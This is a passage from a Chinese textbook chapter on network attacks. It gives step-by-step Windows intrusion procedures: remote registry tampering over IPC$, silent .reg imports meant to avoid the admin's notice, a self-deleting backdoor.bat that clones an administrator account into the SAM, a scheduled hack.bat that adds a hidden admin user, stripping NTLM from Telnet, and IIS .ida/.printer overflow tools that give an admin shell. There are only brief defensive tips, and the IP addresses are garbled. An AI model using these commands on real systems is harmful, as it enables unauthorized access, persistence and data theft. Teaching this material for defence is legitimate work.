DESCRIPTOR設(shè)計用來存儲硬件元件或驅(qū)動程序的資源列表的一系列嵌套數(shù)組表2.10 注冊表數(shù)據(jù)類型說明可以通過以下兩種方法增強注冊表的安全性。（1）禁止使用注冊表編輯器（2）刪除“遠(yuǎn)程注冊表服務(wù)”2．入侵遠(yuǎn)程主機(jī)的注冊表（1）開啟遠(yuǎn)程主機(jī)的“遠(yuǎn)程注冊表服務(wù)”入侵者一般都通過遠(yuǎn)程進(jìn)入目標(biāo)主機(jī)注冊表，因此，如果要連接遠(yuǎn)程目標(biāo)主機(jī)的“網(wǎng)絡(luò)注冊表”實現(xiàn)注冊表入侵的話，除了能成功地建立IPC$連接外，還需要遠(yuǎn)程目標(biāo)主機(jī)已經(jīng)開啟了“遠(yuǎn)程注冊表服務(wù)”，如圖2.18所示。圖2.18遠(yuǎn)程注冊表服務(wù)開啟遠(yuǎn)程主機(jī)服務(wù)的過程如下。①建立IPC$連接。②打開“計算機(jī)管理”，使用“計算機(jī)管理”管理遠(yuǎn)程計算機(jī)。③開啟遠(yuǎn)程注冊表服務(wù)。④關(guān)閉“計算機(jī)管理”，斷開IPC$連接。（2）連接遠(yuǎn)程主機(jī)的注冊表入侵者可以通過Windows自帶的工具連接遠(yuǎn)程主機(jī)的注冊表并進(jìn)行修改。具體步驟如下。①執(zhí)行regedit來打開注冊表編輯器。打開“運行”對話框，輸入“regedit”命令，如圖2.19所示。圖2.19運行對話框②建立IPC$連接。③連接遠(yuǎn)程主機(jī)注冊表。在注冊表編輯器界面中，選擇“注冊表”→”連接網(wǎng)絡(luò)注冊表”。然后在彈出的對話框內(nèi)輸入遠(yuǎn)程主機(jī)的IP地址，最后單擊“確定”按鈕。連接網(wǎng)絡(luò)注冊表成功后，入侵者可以通過該工具在本地修改遠(yuǎn)程注冊表。

這種方式得到的網(wǎng)絡(luò)注冊表只有3個根項。④斷開網(wǎng)絡(luò)注冊表。當(dāng)修改完遠(yuǎn)程主機(jī)的注冊表后，需要斷開網(wǎng)絡(luò)注冊表。鼠標(biāo)右鍵單擊遠(yuǎn)程主機(jī)的IP地址處，在彈出的快捷菜單中選擇“斷開”選項。3．使用reg文件修改注冊表（1）reg文件的使用reg文件是Windows系統(tǒng)中的一種特定格式的文本文件，它是方便用戶或安裝程序在注冊表中添加信息而設(shè)計的。

它有自己固定的格式，擴(kuò)展名為reg。①添加主鍵的方法。步驟1：打開記事本，然后編輯添加主鍵，在記事本中寫入：REGEDIT4[HKEY_CURRENT_USERS\Software\HACK]步驟2：保存文件為test1.reg，雙擊該文件，便建立了HACK主鍵，如圖2.20所示。圖2.20HACK主鍵②添加鍵值項方法。為HACK主鍵建立一個名字為“NAME”，類型為“DWORD”，值為“00000000”的鍵值項。打開記事本，寫入：REGEDIT4[HKEY_CURRENT_USER\Software\HACK]"NAME"=dword:00000000保存為TEST2.REG文件，然后雙擊導(dǎo)入，如圖2.21所示。圖2.21導(dǎo)入鍵值項③刪除鍵值項的方法。在記事本中輸入：REGEDIT4[HKEY_CURRENT_USER\Software\HACK]"NAME"=-然后保存為TEST3.REG文件，雙擊導(dǎo)入注冊表，就可以刪除鍵值項。④刪除主鍵。在記事本中輸入：REGEDIT4[-HKEY_CURRENT_USERS\Software\HACK]保存為TEST4.REG文件，雙擊導(dǎo)入注冊表，就可以刪除主鍵。（2）命令行導(dǎo)入通過雙擊注冊表文件把注冊信息導(dǎo)入，每次導(dǎo)入都會有提示對話框，如圖2.22所示，容易被遠(yuǎn)程主機(jī)管理員發(fā)現(xiàn)。圖2.22導(dǎo)入注冊表確認(rèn)對話框通過以下兩種方法把注冊表信息通過無詢問式地導(dǎo)入注冊表。方法1：使用專門的注冊表導(dǎo)入工具。方法2：使用windows系統(tǒng)自帶的導(dǎo)入工具。windows自帶的導(dǎo)入工具使用命令：

regedit/s<reg文件>regedit是系統(tǒng)自帶的命令，不使用任何工具。/s表示不需要詢問，直接導(dǎo)入。（3）遠(yuǎn)程關(guān)機(jī)修改完注冊表后，只有遠(yuǎn)程主機(jī)重新啟動后才能使修改生效。

通過以下兩種方法來關(guān)閉遠(yuǎn)程主機(jī)。①遠(yuǎn)程關(guān)機(jī)方法一打開計算機(jī)管理（本地）。在控制臺樹中，右鍵單擊“計算機(jī)管理”，然后在彈出的快捷菜單中選擇“連接到另一臺計算機(jī)”選項。在“選擇計算機(jī)”對話框的“名稱”框下，選擇要重新啟動或關(guān)閉的計算機(jī)，然后單擊“確定”按鈕。右鍵單擊遠(yuǎn)程計算機(jī)，然后在彈出的快捷菜單中選擇“屬性”選項。在“高級”選項卡上，單擊“啟動和故障恢復(fù)”中的“設(shè)置”按鈕。單擊“關(guān)閉”按鈕，打開“關(guān)閉”對話框。在“操作”欄中，選擇要在連接的計算機(jī)上執(zhí)行的操作。在“強制應(yīng)用程序關(guān)閉”欄中，選擇關(guān)閉或重新啟動計算機(jī)時是否強制關(guān)閉程序，然后單擊“確定”按鈕。②遠(yuǎn)程關(guān)機(jī)方法二使用Windows2003/XP中的shutdown命令遠(yuǎn)程關(guān)機(jī)。

對于沒有該命令的系統(tǒng)（如Windows2000），可以將shutdown.exe工具拷貝到Windows2000的系統(tǒng)文件夾中，就可以使用了。shutdown經(jīng)常使用的參數(shù)如下。s：關(guān)閉計算機(jī)。r：重新啟動計算機(jī)。m\\ip：指定被操作的遠(yuǎn)程計算機(jī)。txx：指定多少時間后關(guān)閉或者重新啟動計算機(jī)。使用shutdown關(guān)閉遠(yuǎn)程計算機(jī)，必須先建立IPC$連接，然后輸入命令進(jìn)行關(guān)機(jī)。

例如，shutdown-s-m\\0-t00實現(xiàn)遠(yuǎn)程關(guān)閉。2.3.5安全解決方案下面列出幾條安全解決方案以供參考。①加強個人網(wǎng)絡(luò)安全保護(hù)意識。②刪除默認(rèn)的共享，盡量不要開放共享資源，資源迫不得已可以將訪問者的權(quán)限降至最低。③禁止空連接進(jìn)行枚舉攻擊。④使用正版防火墻軟件和殺毒工具，及時升級。⑤設(shè)置代理服務(wù)器，隱藏自已的IP地址。⑥將防毒、防黑當(dāng)成日常性工作，定時更新防毒組件，將防毒軟件保持在常駐狀態(tài)，以徹底防毒。⑦對于重要的個人資料做好嚴(yán)密的保護(hù)，并養(yǎng)成資料備份的習(xí)慣。2.4網(wǎng)絡(luò)攻擊的善后階段2.4.1隱藏技術(shù)1．文件傳輸與文件隱藏技術(shù)所謂“隱藏入侵”，是指入侵者利用其他計算機(jī)代替自己執(zhí)行掃描、漏洞溢出、連接建立、遠(yuǎn)程控制等操作。入侵者們把這種代替他們完成入侵任務(wù)的計算機(jī)稱為“肉雞”。

在隱藏技術(shù)中必然涉及入侵者將文件傳輸?shù)健叭怆u”中并隱藏的問題。（1）幾種文件傳輸方式IPC$文件傳輸FTP傳輸打包傳輸（2）文件隱藏簡單隱藏利用專用文件夾隱藏2．掃描隱藏技術(shù)3．入侵隱藏技術(shù)2.4.2留后門從入侵者角度來看，后門分為賬號后門、漏洞后門和木馬后門。1．賬號后門賬號永遠(yuǎn)是系統(tǒng)敞開的大門。

入侵者為了能夠永久控制遠(yuǎn)程主機(jī)/服務(wù)器，他們會在第一次入侵成功后便馬上在遠(yuǎn)程主機(jī)/服務(wù)器內(nèi)部建立一個備用的管理員賬號，這種賬號就是“后門賬號”。

入侵者常用的留賬號后門的方法是克隆賬號。要修改SAM，經(jīng)常需要使用工具PSU.exe，使用方式是：psu[參數(shù)選項]p<要運行的文件名>。i<要su到的進(jìn)程號>默認(rèn)su到的進(jìn)程為system。（1）克隆賬號的步驟步驟1：打開注冊表編輯器，可以看到SAM一般是無法進(jìn)行修改的。如果想修改，必須提升權(quán)限，如圖2.24所示。圖2.24注冊表編輯器中的SAM步驟2：通過進(jìn)程管理器查看System進(jìn)程，并記錄該進(jìn)程PID，Windows2000一般為8，如圖2.25所示。圖2.25查看系統(tǒng)進(jìn)程的PID步驟3：使用psu.exe提升權(quán)限，如圖2.26所示。步驟4：查看SAM中的賬號信息，其中Users\Names下有所有賬號列表，在User鍵下，以十六進(jìn)制數(shù)字為名的鍵記錄著賬號的權(quán)限、密碼等配置。圖2.26使用psu提升權(quán)限步驟5：克隆賬號，就是把Guest賬號的權(quán)限克隆為管理員權(quán)限。步驟6：禁用Guest賬號，如圖2.27所示。圖2.27禁用Guest賬號步驟7：查看Guest賬號。使用的命令如下。netuserguestnetlocalgroupadministrators步驟8：使用Guest賬號進(jìn)行IPC$連接，測試賬號是否可用。如圖2.28所示，雖然在步驟6中禁用了Guest賬號，我們?nèi)匀豢梢允褂迷撡~號。圖2.28使用Guest賬號進(jìn)行IPC$入侵

（2）命令行方式克隆賬號①使用命令行方式克隆賬號需要以下工具。reg.exe：命令行下的注冊表編輯工具。psu.exe：權(quán)限提升工具。pslist.exe：查看遠(yuǎn)程主機(jī)進(jìn)程。②命令行方式克隆賬號的步驟如下。步驟1：編寫B(tài)AT文件backdoor.bat。psu–p"regedit/sdelf.reg"–i%1psu–p"regcopyhklm\SAM\SAM\Domains\Account\Users\000001F4\fhklm\SAM\SAM\Domains\Account\Users\000001F5\f"–i%1netuserguest/active:yesnetuserguest123456789netuserguest/active:nodeldelf.regdelreg.exedelpsu.exedelbackdoor.bat步驟2：使用pslist.exe查看遠(yuǎn)程主機(jī)的System進(jìn)程PID，使用命令為“pslist\\ip-u用戶名-p密碼”。步驟3：上傳backdoor.bat，運行批處理進(jìn)行賬號克隆。步驟4：建立IPC$連接進(jìn)行驗證，退出。2．漏洞后門3．木馬后門實訓(xùn)1網(wǎng)絡(luò)的常用攻擊方法【實訓(xùn)目的】【實訓(xùn)需求】【實訓(xùn)步驟】1．掃描入侵（1）獲取局域網(wǎng)內(nèi)主機(jī)00的資源信息①ping–a00–t獲取主機(jī)名。②netstat–a00獲取所在域及相關(guān)信息。③netview00獲取共享資源。④nbtstat–a00獲取所在域及相關(guān)信息。（2）使用X-SCAN掃描局域網(wǎng)內(nèi)主機(jī)00X-SCAN主界面如圖2.29所示。圖2.29X-SCAN主界面①設(shè)置掃描地址范圍。X-SCAN掃描范圍的設(shè)置如圖2-30所示。②在掃描模塊中設(shè)置要掃描的項目，如圖2-31所示。圖2.30X-SCAN掃描范圍設(shè)置圖2.31X-SCAN掃描模塊設(shè)置③設(shè)置并發(fā)掃描參數(shù)，如圖2-32所示。④在掃描中跳過沒有響應(yīng)的主機(jī)，如圖2.33所示。圖2.32X-SCAN并發(fā)掃描參數(shù)設(shè)置圖2.33X-SCAN其他參數(shù)設(shè)置⑤設(shè)置要檢測的端口及檢測方式，如圖2-34所示。⑥開始掃描，查看掃描報告。圖2.34X-SCAN檢測方式設(shè)置2．主機(jī)入侵（1）IPC$連接的建立與斷開通過IPC$連接遠(yuǎn)程目標(biāo)主機(jī)的條件是已獲得目標(biāo)主機(jī)管理員賬號和密碼。①執(zhí)行“開始”→“運行”命令，在

“運行”對話框中輸入“cmd”。②建立IPC$連接，假設(shè)1這臺計算機(jī)“administrator”用戶的密碼為“qqqqqq”，則輸入命令：netuse\\1\ipc$"qqqqqq"/user:"administrator"③映射網(wǎng)絡(luò)驅(qū)動器，使用命令：netusez:\\1\c$④映射成功后，打開“我的電腦”，會發(fā)現(xiàn)多了一個Z盤，該磁盤即為目標(biāo)主機(jī)的C盤。圖2.35運行CMD圖2.36建立IPC$連接⑤查找指定文件，用鼠標(biāo)右鍵單擊Z盤，在彈出的快捷菜單中選擇“搜索”選項，查找關(guān)鍵字“賬目”，結(jié)果如圖2.37所示。將該文件夾復(fù)制、粘貼到本地磁盤，其操作就像對本地磁盤進(jìn)行操作一樣。圖2.37資源管理器⑥斷開連接，輸入“netuse*/del”命令斷開所有的IPC$連接，如圖2.38所示。⑦通過命令：“netuse\\目標(biāo)IP\ipc$\del”可以刪除指定目標(biāo)IP的IPC$連接。圖2.38斷開IPC連接（2）建立后門賬號①編寫B(tài)AT文件。打開記事本，輸入“netusersysback123456/add”和“netlocalgroupadministratorssysback/add”命令，編寫完后，另存為“hack.bat”，如圖2.39所示。圖2.39hack.bat編輯②與目標(biāo)主機(jī)建立IPC$連接。③復(fù)制文件到目標(biāo)主機(jī)。打開MS-DOS，輸入“copyhack.bat\\1\d$”命令。COPY命令執(zhí)行成功后，就已經(jīng)把E盤下的hack.bat文件拷貝到1的D盤內(nèi)，如圖2.40所示。圖2.40hack.bat復(fù)制④通過計劃任務(wù)使遠(yuǎn)程主機(jī)執(zhí)行hack.bat文件，輸入“nettime\\1”命令，查看目標(biāo)系統(tǒng)時間，如圖2.41所示。圖2.41hack.bat遠(yuǎn)處執(zhí)行⑤如果目標(biāo)系統(tǒng)的時間為23:22，則可輸入“at\\123:30d:\hack.bat”命令，計劃任務(wù)添加完畢后，使用命令“netuse*/del”斷開IPC$連接。⑥驗證賬號是否成功建立。等一段時間后，估計遠(yuǎn)程主機(jī)已經(jīng)執(zhí)行了hack.bat文件。通過建立IPC$連接來驗證是否成功建立“sysback”賬號。若連接成功，說明管理員賬號“sysback”已經(jīng)成功建立連接。（3）Telnet入侵實例①打開計算機(jī)管理，如圖2.42所示。建立IPC$連接。②連接遠(yuǎn)程計算機(jī)。③選擇操作-連接到另一臺計算機(jī)，如圖2.43所示。圖2.42打開計算機(jī)管理圖2.43選擇計算機(jī)④開啟“計劃任務(wù)”服務(wù)，如圖2.44所示。⑤開啟Telnet服務(wù)，如圖2.45所示。圖2.44開啟計劃任務(wù)圖2.45開啟Telnet服務(wù)⑥查看計算機(jī)管理中的信息，如圖2.46所示。⑦去掉NTML驗證。圖2.46計算機(jī)管理信息［方法1］在本地計算機(jī)建立一個與遠(yuǎn)程主機(jī)相同的賬號和密碼。通過“開始”→“程序”→“附件”找到“命令提示符”，使用鼠標(biāo)右鍵單擊“命令提示符”，然后選擇“屬性”。在“以其他用戶身份運行”前面打鉤。在MS-DOS界面中進(jìn)行Telnet登錄。［方法2］首先建立telnet.txt文件，然后寫入3，7，y，0，y，0，0。建立批處理文件tel.bat，輸入命令tlntadmn<telnet.txt。該命令是把telnet.txt中的內(nèi)容導(dǎo)入tlntadmn.exe。建立IPC$連接，將telnet.txt和tel.bat拷貝到遠(yuǎn)程計算機(jī)，并通過at命令執(zhí)行tel.bat，去除NTLM認(rèn)證。⑧使用telnet命令進(jìn)行Telnet連接測試。3．IIS漏洞的入侵（1）基于*.ida漏洞的入侵①掃描遠(yuǎn)程服務(wù)器，尋找有漏洞的主機(jī)。打開X-scan，按照如圖2.47和圖2.48所示，填好掃描項目，開始掃描遠(yuǎn)程主機(jī)。掃描完畢后，在掃描報告中，發(fā)現(xiàn)遠(yuǎn)程服務(wù)器01存在IIS.IDAISAPI過濾器漏洞。圖2.47選擇掃描范圍圖2.48選擇掃描模塊在瀏覽器的地址欄中輸入：“01/*.ida”，返回信息“文件c:\inetpub\wwwroot\*.ida文件名、目錄名或卷標(biāo)語法不正確”，確認(rèn)遠(yuǎn)程主機(jī)存在漏洞，并得到遠(yuǎn)程服務(wù)器提供Web服務(wù)的根目錄是c:\inetpub\wwwroot。②IDA溢出，將工具IDAHack.exe拷貝到%systemroot%/system32目錄下。在命令

行下輸入“idahack01801520”（說明：目標(biāo)主機(jī)沒有打補丁，因此主機(jī)類型是1），打開端口號520，等待Telnet登錄，如圖2.49所示。圖2.49IDA溢出注釋：如果使用ida.exe工具，則在命令行中輸入“ida01800”即可打開Telnet端口號99。③Telnet登錄，在MS-DOS中輸入“telnet01520”命令遠(yuǎn)程登錄服務(wù)器

（見圖2.50）。該Telnet登錄并無身份驗證，如果登錄成功，立即得到Shell，該Shell擁有管理員權(quán)限，可以在其中執(zhí)行任何命令。圖2.50輸入Telnet命令④建立賬號，如圖2.51所示，入侵成功后，在遠(yuǎn)程服務(wù)器上建立管理員賬號，如圖2.52所示。圖2.51成功入侵圖2.52在遠(yuǎn)程主機(jī)上創(chuàng)建管理員賬號此時，入侵者便獲得了一個遠(yuǎn)程主機(jī)上的管理員賬號，可以通過系統(tǒng)認(rèn)證來“合法”地使用“計算機(jī)管理”或“DameWare”等工具遠(yuǎn)程控制服務(wù)器，并且在遠(yuǎn)程服務(wù)器上添加了后門賬號。⑤使用“exit”命令退出登錄。（2）基于.Printer漏洞的入侵①使用X-Scan工具掃描遠(yuǎn)程服務(wù)器。②使用iisx.exe工具連接有.Printer漏洞的主機(jī)01，如圖2.53所示。圖2.53使用iisx連接遠(yuǎn)程主機(jī)③執(zhí)行Telnet命令“Telnet017788”，入侵遠(yuǎn)程主機(jī)。④在遠(yuǎn)程主機(jī)上創(chuàng)建管理員后門賬號。⑤使用“exit”命令退出登錄。（3）使用Unicode